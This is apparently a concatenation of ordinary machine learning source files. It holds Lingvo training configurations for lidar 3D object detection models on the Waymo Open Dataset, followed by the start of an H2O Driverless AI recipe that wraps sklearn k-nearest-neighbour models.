train_params_fn: A callable that returns a Params() input object.
Returns:
An input params called in the context of a trainer.
"""
cluster = cluster_factory.Current()
train_cluster_p = cluster.params.Copy()
train_cluster_p.job = 'trainer_client'
train_cluster_p.mode = 'sync'
# When running a decoding only job, the job is configured so that there are no
# worker replicas.
#
# This prevents us from fetching the training parameters (an assert triggers
# if you try to fetch the training params with 0 workers), so we set worker
# replicas to 1 as a dummy value.
if train_cluster_p.worker.replicas <= 0:
train_cluster_p.worker.replicas = 1
with cluster_factory.Cluster(train_cluster_p):
train_input_p = train_params_fn()
return train_input_p
def AddPreprocessor(input_p,
name,
new_preprocessor_p,
insert_before=None,
insert_after=None):
"""Add a new preprocessor before an existing preprocessor.
Args:
input_p: The input params.
name: A string with the name of the new preprocessor.
new_preprocessor_p: The params of the new preprocessor.
insert_before: A string with which preprocessor to insert the new
preprocessor before. Defaults to None. Must specify either this or
`insert_after`.
insert_after: A string with which preprocessor to insert the new
preprocessor before. Defaults to None. Must specify either this or
`insert_before`.
Returns:
input_p: The input preprocessor with the new added preprocessor.
"""
if insert_before and insert_before not in input_p.preprocessors_order:
raise ValueError('`insert_before` preprocessor `{}` not found in '
'preprocessors_order.'.format(insert_before))
if insert_after and insert_after not in input_p.preprocessors_order:
raise ValueError('`insert_after` preprocessor `{}` not found in '
'preprocessors_order.'.format(insert_after))
if insert_before is None and insert_after is None:
raise ValueError('Must either specify `insert_before` or `insert_after`.')
if insert_before is not None and insert_after is not None:
raise ValueError('Please only provide `insert_before` or `insert_after` '
'not both.')
input_p.preprocessors.Define(name, new_preprocessor_p, '')
if insert_before:
insert_index = input_p.preprocessors_order.index(insert_before)
else:
insert_index = input_p.preprocessors_order.index(insert_after) + 1
input_p.preprocessors_order = (
input_p.preprocessors_order[:insert_index] + [name] +
input_p.preprocessors_order[insert_index:])
return input_p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1Base(base_model_params.SingleTaskModelParams):
"""Base model using point pillars featurization on a point cloud grid.
This the base model, please refer to specialized vehicles, pedestrians, etc.
models below to get an appropriate model to train.
"""
RUN_LOCALLY = 'BORG_TASK_HANDLE' not in os.environ
NUM_PILLARS = 16000
NUM_LASER_FEATURES = 3
ANGLE_BIN_NUM = 12
FRAME_OFFSETS = None
FRAME_DROPOUT_RATE = 0.
CAMERA_INPUT = False
GRID_SETTINGS = input_preprocessors.MakeGridSettings(
grid_x_range=(-85.00, 85.00),
grid_y_range=(-85.00, 85.00),
grid_z_range=(-3, 3),
grid_x=512,
grid_y=512,
grid_z=1)
TASK_CLS = pillars_anchor_free.AnchorFreePillarsBase
METADATA = waymo_metadata.WaymoMetadata()
CLASS_NAMES = METADATA.ClassNames()
NUM_CLASSES = len(CLASS_NAMES)
def _configure_input_single_frame(self, p, split):
p.file_datasource.file_pattern_prefix = _WAYMO_BASE
job_type = cluster_factory.Current().job
max_num_points = int(64 * 2560 * 1.5)
p.preprocessors = _NestedMapToParams(
py_utils.NestedMap(
filter_nlz_points=waymo_open_input_generator.FilterNLZPoints.Params(
),
filter_groundtruth=(
input_preprocessors.FilterGroundTruthByDifficulty.Params()),
viz_copy=input_preprocessors.CreateDecoderCopy.Params(),
points_to_grid=input_preprocessors.PointsToGrid.Params().Set(
normalize_td_labels=False),
grid_to_pillars=input_preprocessors.GridToPillars.Params().Set(
num_pillars=self.NUM_PILLARS),
grid_anchor_centers=input_preprocessors.GridAnchorCenters.Params(),
assign_points=input_preprocessors.PointAssignment.Params(
num_classes=self.NUM_CLASSES),
pad_lasers=input_preprocessors.PadLaserFeatures.Params().Set(
max_num_points=max_num_points),
))
p.preprocessors.viz_copy.pad_lasers.max_num_points = max_num_points
p.preprocessors_order = [
'filter_nlz_points',
'filter_groundtruth',
'viz_copy',
'points_to_grid',
'grid_to_pillars',
'grid_anchor_centers',
'assign_points',
'pad_lasers',
]
# Only train on LEVEL_1, and evaluate on LEVEL_2 or lower.
if job_type.startswith('trainer'):
p.preprocessors.filter_groundtruth.difficulty_threshold = 1
else:
p.preprocessors.filter_groundtruth.difficulty_threshold = 2
self.GRID_SETTINGS().UpdateGridParams(p.preprocessors.points_to_grid)
self.GRID_SETTINGS().UpdateAnchorGridParams(
p.preprocessors.grid_anchor_centers)
# If this is not the decoder job (e.g., this is trainer), do not
# count points and do not make visualization copies.
if job_type != 'decoder':
p.preprocessors_order.remove('viz_copy')
if job_type.startswith('trainer'):
p.batch_size = 2
else:
p.batch_size = 4
if self.RUN_LOCALLY:
p.num_batcher_threads = 1
p.file_buffer_size = 1
p.file_parallelism = 1
else:
p.num_batcher_threads = 16
p.file_buffer_size = 32
p.file_parallelism = 32
return p
def _configure_input(self, p, split):
if self.FRAME_OFFSETS:
raise NotImplementedError
else:
return self._configure_input_single_frame(p, split)
def Train(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoTrainSpec(p)
p = self._configure_input(p, 'Train')
return p
def Minitrain(self):
p = self.Train()
p = waymo_params.WaymoMiniTrainSpec(p)
return p
def Test(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoTestSpec(p)
p = self._configure_input(p, 'Test')
return p
def Dev(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoValSpec(p)
p = self._configure_input(p, 'Dev')
return p
def Minidev(self):
p = self.Dev()
p = waymo_params.WaymoMinivalSpec(p)
return p
def Task(self):
# Number of classes can be fetched from input.
p = self.TASK_CLS.Params(
grid_size_z=self.GRID_SETTINGS().GRID_Z,
num_classes=self.NUM_CLASSES,
num_laser_features=self.NUM_LASER_FEATURES,
angle_bin_num=self.ANGLE_BIN_NUM)
p.name = 'anchor_free_point_pillars_waymo'
p.output_decoder = waymo_decoder.WaymoOpenDatasetDecoder.Params()
p.max_nms_boxes = 512
p.use_oriented_per_class_nms = True
# Note: Sub-classes need to set nms_iou_threshold and nms_score_threshold
# appropriately.
p.nms_iou_threshold = [0.0] * self.NUM_CLASSES
# TODO(jngiam): 1.1 for untrained classes is needed to avoid an issue
# with boxutils error.
p.nms_score_threshold = [1.1] * self.NUM_CLASSES
p.nms_iou_threshold[self.CLASS_NAMES.index('Vehicle')] = 0.5
p.nms_score_threshold[self.CLASS_NAMES.index('Vehicle')] = 0.05
ep = p.eval
# Train set uses a smaller decoding set, so we can
# safely eval over the entire input.
ep.samples_per_summary = 0
tp = p.train
tp.optimizer = optimizer.Adam.Params()
tp.clip_gradient_norm_to_value = 50
# To be tuned.
p.train.l2_regularizer_weight = 1e-4
# Adapted from V1 tuning.
tp.ema_decay = 0.99
# TODO(b/148537111): consider setting this to True.
tp.ema_decay_moving_vars = False
train_input_p = TrainerInputParams(self.Train)
# Get number of parallel processing cores for the worker.
# This is 8 for a 2x2 TPU, or 1 for a single GPU.
cluster = cluster_factory.Current()
total_num_cores = cluster.total_worker_devices
total_batch_size = train_input_p.batch_size * total_num_cores
# Set learning rate and schedule.
tp.learning_rate = 1e-4 * total_batch_size / 2
# Train for 75 epochs.
lr_util.SetExponentialLR(
train_p=tp,
train_input_p=train_input_p,
exp_start_epoch=5,
total_epoch=75)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1Ped(AnchorFreePillarsModelV1Base):
"""Pedestrian model w/ 512x512, 32k pillars, 1 stride in backbone."""
BLOCK0_STRIDE = 1
NUM_PILLARS = 32000
USE_BASIC_DATA_AUG = False
VALID_CLASS_NAMES = ['Pedestrian']
def _configure_input(self, p, split):
job_type = cluster_factory.Current().job
p = super()._configure_input(p, split)
if job_type.startswith('trainer') and self.USE_BASIC_DATA_AUG:
p.preprocessors.Define('global_loc_noise',
input_preprocessors.GlobalTranslateNoise.Params(),
'')
p.preprocessors.Define(
'rot_box',
input_preprocessors.RandomBBoxTransform.Params().Set(
max_rotation=np.pi / 20.), '')
p.preprocessors.Define('random_flip',
input_preprocessors.RandomFlipY.Params(), '')
p.preprocessors.Define(
'world_scaling',
(input_preprocessors.WorldScaling.Params().Set(scaling=[0.95, 1.05])),
'')
p.preprocessors_order = [
'rot_box', 'random_flip', 'world_scaling', 'global_loc_noise'
] + p.preprocessors_order
# Overwrites previous filtering. For multi frame model, this is already done
# when preparing the input (See ConfigurePillarsSquashedSequenceInputs).
if not self.FRAME_OFFSETS:
_FilterKeepLabels(p, self.VALID_CLASS_NAMES)
self.GRID_SETTINGS().UpdateAnchorGridParams(
p.preprocessors.grid_anchor_centers, output_stride=self.BLOCK0_STRIDE)
return p
def Task(self):
p = super().Task()
pillars_builder = pillars.Builder()
p.backbone = pillars_builder.Backbone(
odims=self.TASK_CLS.NUM_OUTPUT_CHANNELS,
down_strides=(self.BLOCK0_STRIDE, 2, 2))
# Initialize the class detector's bias term to be negative in line
# with focal losses paper (so predictions init as background).
p.class_detector = pillars_builder.Detector(
name='class',
idims=(3 * self.TASK_CLS.NUM_OUTPUT_CHANNELS),
odims=(p.grid_size_z * p.num_classes),
bias_params_init=py_utils.WeightInit.Constant(-4.595))
# Normalization hurts the training in some steps:
# pc_046 is without normalization, pc_047 is with.
p.loss_norm_type = pillars.LossNormType.NO_NORM
metadata = waymo_metadata.WaymoMetadata()
num_classes = len(metadata.ClassNames())
p.use_oriented_per_class_nms = True
p.max_nms_boxes = 512
p.nms_iou_threshold = [0.0] * num_classes
p.nms_iou_threshold[metadata.ClassNames().index('Pedestrian')] = 0.46
p.nms_score_threshold = [1.1] * num_classes
p.nms_score_threshold[metadata.ClassNames().index('Pedestrian')] = 0.01
p.per_class_loss_weight = [0.] * num_classes
p.per_class_loss_weight[metadata.ClassNames().index('Pedestrian')] = 1.0
# Add the KITTI evaluation metric to the Waymo Open Dataset in order to
# perform calibration analysis.
p = AddKITTIMetric(p)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedDV(AnchorFreePillarsModelV1Ped):
"""V1 Pedestrian with Dynamic voxelization."""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
if self.FRAME_OFFSETS:
assert 'points_to_grid' not in p.preprocessors_order
assert 'grid_to_pillars' not in p.preprocessors_order
else:
p.preprocessors_order.remove('points_to_grid')
p.preprocessors_order.remove('grid_to_pillars')
return p
def Task(self):
p = super().Task()
p.input_featurizer = pillars.DynamicVoxelizationFeaturizer.Params(
p.num_laser_features)
# Update input_featurizer settings by reference.
self.GRID_SETTINGS().UpdateGridParams(p.input_featurizer)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedAug(AnchorFreePillarsModelV1PedDV):
"""V1 Ped model w/ dynamic voxelization and aug.
highest L1 mAP: 65.9
"""
APPLY_DATA_AUG = True
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_DATA_AUG:
p = AddPreprocessor(
p,
'random_flip',
input_preprocessors.RandomFlipY.Params().Set(flip_probability=0.25),
insert_before='grid_anchor_centers')
p = AddPreprocessor(
p,
'global_rot',
input_preprocessors.RandomWorldRotationAboutZAxis.Params().Set(
max_rotation=np.pi / 4.),
insert_before='grid_anchor_centers')
return p
def Task(self):
p = super().Task()
p.output_decoder.ap_metric.waymo_breakdown_metrics = ['RANGE', 'VELOCITY']
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedCenterNess(AnchorFreePillarsModelV1PedAug):
"""Add center-ness loss in the pedestrian model.
highest L1 mAP: 69.5
"""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer'):
p.preprocessors.assign_points.extra_label_range = [0.0, 1.0]
return p
def Task(self):
p = super().Task()
p.centerness_loss_weight = 1.0
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedCenterNessRelated(
AnchorFreePillarsModelV1PedCenterNess):
"""Times center-ness label with regression mask.
That is, if a pillar has higher center-ness label, it will also have higher
regression loss weight.
highest L1 mAP: 71
"""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer'):
# Use center-ness label to reweight regression loss.
p.preprocessors.assign_points.extra_label_related_reg_mask = True
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1VehicleCenterNess(
AnchorFreePillarsModelV1PedCenterNessRelated):
"""This is the model of refactoring anchor-free pillars.
highest L1 mAP: 65.22
"""
GRID_SETTINGS = input_preprocessors.MakeGridSettings(
grid_x_range=(-76.8, 76.8),
grid_y_range=(-76.8, 76.8),
grid_z_range=(-3, 3),
grid_x=512,
grid_y=512,
grid_z=1)
VALID_CLASS_NAMES = ['Vehicle']
def Task(self):
p = super().Task()
metadata = waymo_metadata.WaymoMetadata()
class_names = metadata.ClassNames()
num_classes = len(class_names)
p.nms_iou_threshold = [0.0] * num_classes
p.nms_score_threshold = [1.1] * num_classes
p.per_class_loss_weight = [0.] * num_classes
p.nms_iou_threshold[class_names.index('Vehicle')] = 0.2
p.nms_score_threshold[class_names.index('Vehicle')] = 0.001
p.per_class_loss_weight[metadata.ClassNames().index('Vehicle')] = 1.0
p.max_nms_boxes = 256
p.train.l2_regularizer_weight = 0.0
p.centerness_loss_weight = 0.0
return p
@model_registry.RegisterSingleTaskModel
class CenterPointImprovedVehicle(AnchorFreePillarsModelV1VehicleCenterNess):
"""CenterPoint Vehicle model with improved implementation.
Following parameters are tuned to achieve better performance: nms parameters,
weight decay, gradient clip, data augmentation, training schedule, activation
function, featurizer, backbone channels, EMA, and train with LEVEL_2
difficulty data.
highest L1 mAP: 76.45
"""
VALID_CLASS_NAMES = ['Vehicle']
NMS_IOU_THRESHOLD = 0.8
NMS_SCORE_THRESHOLD = 0.01
L2_REGULARIZER_WEIGHT = 0
PER_CLASS_LOSS_WEIGHT = 1.0
CLIP_GRADIENT_NORM_TO_VALUE = 5
APPLY_DATA_AUG = False
APPLY_STRONG_DATA_AUG = True
MAX_ROTATION = 3.14159
EPOCH = 60
WARM_UP_EPOCH = 3
LEARN_RATE = 3e-4
NUM_OUTPUT_FEATURES = 256
MLP_DIMS = [256, 256, 512]
ACTIVATION = 'SWISH'
def _apply_strong_data_aug(self, p, insert_before='grid_anchor_centers'):
"""Apply strong data augmentations to an input params."""
# Global Rotation.
p = AddPreprocessor(
p,
'random_apply_global_rot',
input_preprocessors.RandomApplyPreprocessor.Params().Set(
prob=0.74,
choice_save_prefix='inverse_aug.global_rot',
subprocessor=(
input_preprocessors.RandomWorldRotationAboutZAxis.Params().Set(
max_rotation=0.41,
include_world_rot_z=False,
rot_save_key='inverse_aug.global_rot.rot'))),
insert_before=insert_before)
# World Scaling.
p = AddPreprocessor(
p,
'world_scaling',
input_preprocessors.WorldScaling.Params().Set(
scaling_save_key='inverse_aug.world_scaling.scaling',
scaling=[0.95, 1.05]),
insert_before=insert_before)
# Global Translation.
p = AddPreprocessor(
p,
'global_loc_noise',
input_preprocessors.GlobalTranslateNoise.Params().Set(
noise_save_key='inverse_aug.global_loc_noise.noise',
noise_std=[0., 0., 0.35]),
insert_before=insert_before)
# Random Flip.
p = AddPreprocessor(
p,
'random_flip',
input_preprocessors.RandomFlipY.Params().Set(
flip_save_key='inverse_aug.random_flip.flip', flip_probability=0.5),
insert_before=insert_before)
# Frustum Dropout.
p = AddPreprocessor(
p,
'random_apply_frustum_dropout',
input_preprocessors.RandomApplyPreprocessor.Params().Set(
prob=0.3575,
subprocessor=(input_preprocessors.FrustumDropout.Params().Set(
theta_width=0.08,
phi_width=1.07,
distance=9.46,
drop_type='union',
keep_prob=0.44))),
insert_before=insert_before)
# Frustum Noise.
p = AddPreprocessor(
p,
'random_apply_frustum_noise',
input_preprocessors.FrustumNoise.Params().Set(
theta_width=0.03, phi_width=0.0),
insert_before=insert_before)
# Random Dropout.
p = AddPreprocessor(
p,
'random_apply_random_dropout',
input_preprocessors.RandomDropLaserPoints.Params(),
insert_before=insert_before)
return p
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
# change batch size to 1 for comparing with MultiModal Models.
p.batch_size = 1
# set training data
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_STRONG_DATA_AUG:
assert not self.APPLY_DATA_AUG
p = self._apply_strong_data_aug(p)
p.preprocessors.random_apply_global_rot.subprocessor.max_rotation = self.MAX_ROTATION
p.preprocessors.filter_groundtruth.difficulty_threshold = 2
return p
def Task(self):
p = super().Task()
# Set class specific parameters (nms, loss weight, l2 loss, gradient clip).
metadata = waymo_metadata.WaymoMetadata()
class_names = metadata.ClassNames()
num_classes = len(class_names)
nms_iou_threshold = self.NMS_IOU_THRESHOLD if isinstance(
self.NMS_IOU_THRESHOLD,
list) else [self.NMS_IOU_THRESHOLD] * len(self.VALID_CLASS_NAMES)
nms_score_threshold = self.NMS_SCORE_THRESHOLD if isinstance(
self.NMS_SCORE_THRESHOLD,
list) else [self.NMS_SCORE_THRESHOLD] * len(self.VALID_CLASS_NAMES)
per_class_loss_weight = self.PER_CLASS_LOSS_WEIGHT if isinstance(
self.PER_CLASS_LOSS_WEIGHT,
list) else [self.PER_CLASS_LOSS_WEIGHT] * len(self.VALID_CLASS_NAMES)
p.nms_iou_threshold = [0.0] * num_classes
p.nms_score_threshold = [1.1] * num_classes
p.per_class_loss_weight = [0.] * num_classes
for class_idx, class_name in enumerate(self.VALID_CLASS_NAMES):
p.nms_iou_threshold[class_names.index(
class_name)] = nms_iou_threshold[class_idx]
p.nms_score_threshold[class_names.index(
class_name)] = nms_score_threshold[class_idx]
p.per_class_loss_weight[metadata.ClassNames().index(
class_name)] = per_class_loss_weight[class_idx]
p.train.l2_regularizer_weight = self.L2_REGULARIZER_WEIGHT
if self.CLIP_GRADIENT_NORM_TO_VALUE:
tp = p.train
tp.clip_gradient_norm_to_value = self.CLIP_GRADIENT_NORM_TO_VALUE
# Set architecture.
pillars_builder = pillars.Builder()
pillars_builder.activation_fn = activations.GetFn(self.ACTIVATION)
point_encoder = p.input_featurizer.point_encoder.Instantiate()
encoding_size = point_encoder.NumEncodingFeatures(p.num_laser_features)
p.input_featurizer.featurizer = pillars_builder.MLPFeaturizer(
'feat', [encoding_size] + self.MLP_DIMS + [self.NUM_OUTPUT_FEATURES],
activation_fn=self.ACTIVATION)
backbone_channel_multiplier = self.NUM_OUTPUT_FEATURES // 64
p.backbone = pillars_builder.Backbone(
odims=self.TASK_CLS.NUM_OUTPUT_CHANNELS,
down_strides=(self.BLOCK0_STRIDE, 2, 2),
channel_multiplier=backbone_channel_multiplier,
activation=self.ACTIVATION)
# Get number of parallel processing cores for the worker.
# This is 8 for a 2x2 TPU, or 1 for a single GPU.
tp = p.train
train_input_p = TrainerInputParams(self.Train)
cluster = cluster_factory.Current()
total_num_cores = cluster.total_worker_devices
total_batch_size = train_input_p.batch_size * total_num_cores
# Set learning rate and schedule.
tp.learning_rate = self.LEARN_RATE * total_batch_size / 2
# TODO(ywli): currently the warmup phase is linear rampup,
# but in DeepFusion, Cosine Rampup is used.
# see function SetOneCycleLR from cl/419866459
# lingvo/tasks/car/lr_util.py
lr_util.SetCosineLR(
train_p=tp,
train_input_p=train_input_p,
total_epoch=self.EPOCH,
warmup_epoch=self.WARM_UP_EPOCH,
warmup_init=0.1)
# Set EMA parameters.
tp = p.train
tp.ema_decay = 0.9999
tp.ema_decay_moving_vars = True
return p
@model_registry.RegisterSingleTaskModel
class CenterPointImprovedPedestrian(CenterPointImprovedVehicle):
"""CenterPoint Pedestrian model with improved implementation.
Following parameters are tuned to achieve better performance: nms parameters,
weight decay, gradient clip, data augmentation, training schedule, activation
function, featurizer, backbone channels, EMA, and train with LEVEL_2
difficulty data.
highest L1 mAP: 80.36
"""
MAX_ROTATION = 2.0944
NMS_IOU_THRESHOLD = 0.3
VALID_CLASS_NAMES = ['Pedestrian']
L2_REGULARIZER_WEIGHT = 1e-4
CLIP_GRADIENT_NORM_TO_VALUE = 50
@model_registry.RegisterSingleTaskModel
class UncertaintyCenterPointPed(CenterPointImprovedPedestrian):
"""CenterPoint Pedestrian model with uncertainty loss.
The uncertainty (from https://arxiv.org/abs/1910.11375) is applied to the
location loss and dimensions loss.
highest L1 mAP: 81.49
"""
def Task(self):
p = super().Task()
p.location_loss = pillars_anchor_free.LaplaceKL.Params().Set()
p.dimensions_loss = pillars_anchor_free.LaplaceKL.Params().Set(
targets_scale=0.001)
p.dimensions_loss_weight = 0.3
pillars_builder = pillars.Builder()
p.regression_detector = pillars_builder.Detector(
name='reg',
idims=(3 * self.TASK_CLS.NUM_OUTPUT_CHANNELS),
odims=(p.grid_size_z *
(3 * p.location_loss.num_params_per_prediction +
3 * p.dimensions_loss.num_params_per_prediction +
p.angle_bin_num + p.angle_bin_num)),
conv_init_method=py_utils.WeightInit.Constant(0.0))
return p
@model_registry.RegisterSingleTaskModel
class DeepFusionCenterPointPed(UncertaintyCenterPointPed):
"""DeepFusion CenterPoint Pedstrain Model.
A late-stage deep feature level fusion, with InverseAug and LearnableAlign, to
improve the quality of alignment among multimodal features. For more details,
see https://arxiv.org/pdf/2203.08195.pdf.
"""
CAMERA_INPUT = True
def _apply_inverse_aug(self, p, insert_after='create_cell_center_xyz'):
"""Apply inverse augmentations to an input params."""
# Random Flip.
p = AddPreprocessor(
p,
'inverse_random_flip',
input_preprocessors.InverseRandomFlipY.Params().Set(
flip_save_key='inverse_aug.random_flip.flip',
points_keys=['cell_center_xyz']),
insert_after=insert_after)
# Global Translation.
p = AddPreprocessor(
p,
'inverse_global_loc_noise',
input_preprocessors.InverseGlobalTranslateNoise.Params().Set(
noise_save_key='inverse_aug.global_loc_noise.noise',
points_keys=['cell_center_xyz']),
insert_after='inverse_random_flip')
# World Scaling.
p = AddPreprocessor(
p,
'inverse_world_scaling',
input_preprocessors.InverseWorldScaling.Params().Set(
scaling_save_key='inverse_aug.world_scaling.scaling',
points_keys=['cell_center_xyz']),
insert_after='inverse_global_loc_noise')
# Global Rotation.
p = AddPreprocessor(
p,
'inverse_random_apply_global_rot',
input_preprocessors.InverseRandomApplyPreprocessor.Params().Set(
choice_save_prefix='inverse_aug.global_rot',
subprocessor=(input_preprocessors
.InverseRandomWorldRotationAboutZAxis.Params().Set(
rot_save_key='inverse_aug.global_rot.rot',
points_keys=['cell_center_xyz']))),
insert_after='inverse_world_scaling')
# Check if the order of InverseAug is correct.
assert (p.preprocessors_order.index('random_apply_global_rot') <
p.preprocessors_order.index('world_scaling'))
assert (p.preprocessors_order.index('world_scaling') <
p.preprocessors_order.index('global_loc_noise'))
assert (p.preprocessors_order.index('global_loc_noise') <
p.preprocessors_order.index('random_flip'))
return p
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
if not self.FRAME_OFFSETS:
# Add images when it is a single frame model.
# When it is a multi frame model, the images are automitically added when
# setting CAMERA_INPUT = True
assert self.CAMERA_INPUT
p.extractors.Define(
'images', waymo_open_input_generator.WaymoImageExtractor.Params(), '')
p.preprocessors.Define(
'create_cell_center_xyz',
input_preprocessors.CopyFeatures.Params().Set(
source_key='lasers.points_xyz', target_key='cell_center_xyz'), '')
p.preprocessors.Define(
'cell_center_to_camera',
waymo_open_input_generator.CellCenterToBestCamera.Params().Set(
camera_names=[]), '')
p.preprocessors.Define(
'resize_images',
waymo_open_input_generator.RescaleResizeImages.Params().Set(
rescale=True,
resize_ratio=0.3125,
projected_points_keys=[
'cell_center_projected.points_in_best_camera'
]), '')
p.preprocessors_order += [
'create_cell_center_xyz', 'cell_center_to_camera', 'resize_images'
]
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_STRONG_DATA_AUG:
p = self._apply_inverse_aug(p)
return p
def Task(self):
p = super().Task()
image_builder = deep_fusion.ImageFeatureExtractorBuilder()
learnable_align_builder = deep_fusion.LearnableAlignBuilder(
lidar_channels=self.NUM_OUTPUT_FEATURES)
assert p.input_featurizer.cls == pillars.DynamicVoxelizationFeaturizer
p.input_featurizer.Set(return_dynamic_voxels=True)
p.input_featurizer = deep_fusion.MultiModalFeaturizer.Params().Set(
pointcloud_featurizer=p.input_featurizer,
image_featurizer=image_builder.ImageFeatureExtractor('image_tower'),
fusion=learnable_align_builder.Fusion('fusion'),
camera_feature_aligner=deep_fusion.DeepFusionAligner.Params().Set(
q_embedding=learnable_align_builder.LidarEmbedding('q_embedding'),
k_embedding=learnable_align_builder.ImageEmbedding('k_embedding'),
v_embedding=learnable_align_builder.ImageEmbedding('v_embedding'),
attn_dropout=learnable_align_builder.Dropout('attn_dropout'),
learnable_align_fc=learnable_align_builder.FC('learnable_align_fc'),
))
return p
|
09acdb40ad2946946e2960d0a9f062464d957f2d
|
87491323e6295845dd7239fc213bc6b7955873c0
|
/models/algorithms/knearestneighbour.py
|
9f93a4ceaeab8d5c244917aab59204c1f0ef9c11
|
[
"Apache-2.0"
] |
permissive
|
h2oai/driverlessai-recipes
|
e32d5632dfed52f19c9caeb406d30b956829658c
|
aeb082cfb773d6a0e45fbb7514610987f97b2799
|
refs/heads/master
| 2023-09-03T17:50:45.184460
| 2023-08-21T12:48:47
| 2023-08-21T12:48:47
| 174,063,977
| 239
| 103
|
Apache-2.0
| 2023-08-21T12:48:49
| 2019-03-06T03:26:19
|
Python
|
UTF-8
|
Python
| false
| false
| 9,971
|
py
|
knearestneighbour.py
|
"""K-Nearest Neighbor implementation by sklearn. For small data (< 200k rows)."""
import os
import datatable as dt
import numpy as np
import pandas as pd
from h2oaicore.models_main import MainModel
from h2oaicore.systemutils import config, physical_cores_count, loggerinfo
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsRegressor, KNeighborsClassifier
class KNearestNeighbourModel(CustomModel):
_regression = True
_binary = True
_multiclass = True
_parallel_task = True
_testing_can_skip_failure = False # ensure tested as if shouldn't fail
_display_name = "KNearestNeighbour"
_description = "K Nearest Neighbour Model based on sklearn. Not adviced if the data is larger than 200K rows"
@staticmethod
def can_use(accuracy, interpretability, train_shape=None, test_shape=None, valid_shape=None, n_gpus=0,
num_classes=None, **kwargs):
if config.hard_asserts:
# for bigger data, too slow to test even with 1 iteration
use = train_shape is not None and train_shape[0] * train_shape[1] < 1024 * 1024 or \
valid_shape is not None and valid_shape[0] * valid_shape[1] < 1024 * 1024
# too slow for walmart with only 421k x 15 even with 10 neighbors
use &= train_shape is not None and train_shape[1] < 10
return use
else:
return True
def set_default_params(self, accuracy=None, time_tolerance=None, interpretability=None, **kwargs):
kwargs.pop('get_best', None)
self.mutate_params(accuracy=accuracy, time_tolerance=time_tolerance, interpretability=interpretability,
get_best=True, **kwargs)
def mutate_params(self, accuracy=10, time_tolerance=10, interpretability=1, get_best=False, **kwargs):
# Modify certain parameters for tuning
user_choice = config.recipe_dict.copy()
self.params = dict()
trial = kwargs.get('trial')
list_of_neibs = [1, 2, 5, 10, 50, 100, 150, 200]
if config.recipe == 'kaggle':
list_of_neibs.extend([250, 300])
if 'GIT_HASH' in os.environ and config.hard_asserts:
list_of_neibs = [1]
self.params['n_neighbors'] = MainModel.get_one(list_of_neibs, get_best=get_best,
best_type="first", name="n_neighbors",
trial=trial,
user_choice=user_choice)
self.params['metric'] = MainModel.get_one(["minkowski", "cityblock"], get_best=get_best,
best_type="first", name="metric",
trial=trial,
user_choice=user_choice)
self.params['algorithm'] = MainModel.get_one(['auto', 'ball_tree', 'kd_tree', 'brute'], get_best=get_best,
best_type="first", name="algorithm",
trial=trial,
user_choice=user_choice)
self.params['leaf_size'] = MainModel.get_one([30, 4, 100], get_best=get_best,
best_type="first", name="leaf_size",
trial=trial,
user_choice=user_choice)
self.params['p'] = MainModel.get_one([2, 1], get_best=get_best,
best_type="first", name="p",
trial=trial,
user_choice=user_choice)
self.params['weights'] = MainModel.get_one(['uniform', 'distance'], get_best=get_best,
best_type="first", name="weights",
trial=trial,
user_choice=user_choice)
self.params['standardize'] = MainModel.get_one([False, True], get_best=get_best,
best_type="first", name="standardize",
trial=trial,
user_choice=user_choice)
def transcribe_params(self, params=None, **kwargs):
"""
Fixups of params to avoid any conflicts not expressible easily for Optuna
Or system things only need to set at fit time
:param params:
:return:
"""
params_was_None = False
if params is None:
params = self.params # reference, so goes back into self.params
params_was_None = True
# add anything that needs fixing
if params.get('algorithm', "") not in ['ball_tree', 'kd_tree']:
params.pop('leaf_size', None)
if isinstance(kwargs.get('train_shape'), (tuple, list)) and kwargs.get('train_shape')[0] > 1:
params['n_neighbors'] = min(params['n_neighbors'], kwargs.get('train_shape')[0])
params.pop('standardize', None) # internal parameter, not for actual underlying sklearn model
if params_was_None:
# in case some function didn't preserve reference
self.params = params
return params # default is no transcription
def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):
# system thing, doesn't need to be set in default or mutate, just at runtime in fit, into self.params so can see
self.params["n_jobs"] = self.params_base.get('n_jobs', max(1, physical_cores_count))
params = self.params.copy()
params = self.transcribe_params(params, train_shape=X.shape)
loggerinfo(self.get_logger(**kwargs), "%s fit params: %s" % (self.display_name, dict(params)))
loggerinfo(self.get_logger(**kwargs), "%s data: %s %s" % (self.display_name, X.shape, y.shape))
X = dt.Frame(X)
orig_cols = list(X.names)
if self.num_classes >= 2:
model = KNeighborsClassifier(**params)
lb = LabelEncoder()
lb.fit(self.labels)
y = lb.transform(y)
else:
model = KNeighborsRegressor(**params)
X = self.basic_impute(X)
X = X.to_numpy()
if self.params.get('standardize', False): # self.params since params has it popped out
standard_scaler = StandardScaler()
X = standard_scaler.fit_transform(X)
else:
standard_scaler = None
model.fit(X, y)
importances = self.get_basic_importances(X, y)
self.set_model_properties(model=(model, standard_scaler, self.min),
features=orig_cols,
importances=importances.tolist(), # abs(model.coef_[0])
iterations=0)
def basic_impute(self, X):
